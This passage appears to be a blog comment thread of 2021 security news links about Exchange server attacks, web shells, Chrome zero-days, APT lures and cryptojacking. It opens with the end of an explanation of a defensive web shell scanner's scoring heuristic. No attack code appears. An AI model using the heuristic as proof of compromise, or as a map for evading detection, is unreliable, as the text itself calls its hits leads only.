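On a real server you would point scan_tree at the drive root (or the Exchange install directory) rather than the fixture, and treat a hit as a lead to confirm against IIS logs and file timestamps, not as proof on its own: a legitimate page in owa/auth scores only the location weight, and an app page that merely reads a request item scores one point.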
Tomi Engdahl says:
https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
Tomi Engdahl says:
Update Your Chrome Browser to Patch 2 New In-the-Wild 0-Day Exploits
https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html
Google on Tuesday released a new version of Chrome web-browsing software for Windows, Mac, and Linux with patches for two newly discovered security vulnerabilities, for both of which it says exploits exist in the wild, allowing attackers to engage in active exploitation. See also
https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/04/update-now-chrome-needs-patching-against-two-in-the-wild-exploits/
Tomi Engdahl says:
FBI blasts away web shells on US servers in wake of Exchange vulnerabilities
https://www.zdnet.com/article/fbi-blasts-away-web-shells-on-us-servers-in-wake-of-exchange-vulnerabilities/
Feds turn into cyberfirefighters and hose down the web shell bonfire raging on hundreds of unpatched Exchange servers.
CISA gives federal agencies until Friday to patch Exchange servers
https://www.bleepingcomputer.com/news/security/cisa-gives-federal-agencies-until-friday-to-patch-exchange-servers/
The US Cybersecurity and Infrastructure Security Agency (CISA) has ordered federal agencies to install newly released Microsoft Exchange security updates by Friday.
Tomi Engdahl says:
Threat Actors Targeting Cybersecurity Researchers
https://us-cert.cisa.gov/ncas/current-activity/2021/04/14/threat-actors-targeting-cybersecurity-researchers
Google and Microsoft recently published reports on advanced persistent threat (APT) actors targeting cybersecurity researchers. The APT actors are using fake social media profiles and legitimate-looking websites to lure security researchers into visiting malicious websites to steal information, including exploits and zero-day vulnerabilities.
100,000 Google Sites Used to Install SolarMarket RAT
https://threatpost.com/google-sites-solarmarket-rat/165396/
Search-engine optimization (SEO) tactics direct users searching for common business forms such as invoices, receipts or other templates to hacker-controlled Google-hosted domains.
Tomi Engdahl says:
An Update: The COVID-19 Vaccines Global Cold Chain Continues to Be a Target
https://securityintelligence.com/posts/covid-19-vaccine-global-cold-chain-security/
In December 2020, IBM Security X-Force released a research blog disclosing that the COVID-19 cold chain, an integral part of delivering and storing COVID-19 vaccines at safe temperatures, was targeted by cyber adversaries. After that first report, we recently discovered an additional 50 files tied to spear-phishing emails that targeted 44 companies in 14 countries in Europe, North America, South America, Africa and Asia.
Tomi Engdahl says:
Cyber criminals are installing cryptojacking malware on unpatched Microsoft Exchange servers
https://www.zdnet.com/article/free-money-cyber-criminals-are-installing-cryptojacking-malware-on-unpatched-microsoft-exchange-servers/
Cyber criminals are targeting vulnerable [published in March] Microsoft Exchange servers with cryptocurrency mining malware in a campaign designed to secretly use the processing power of compromised systems to make money.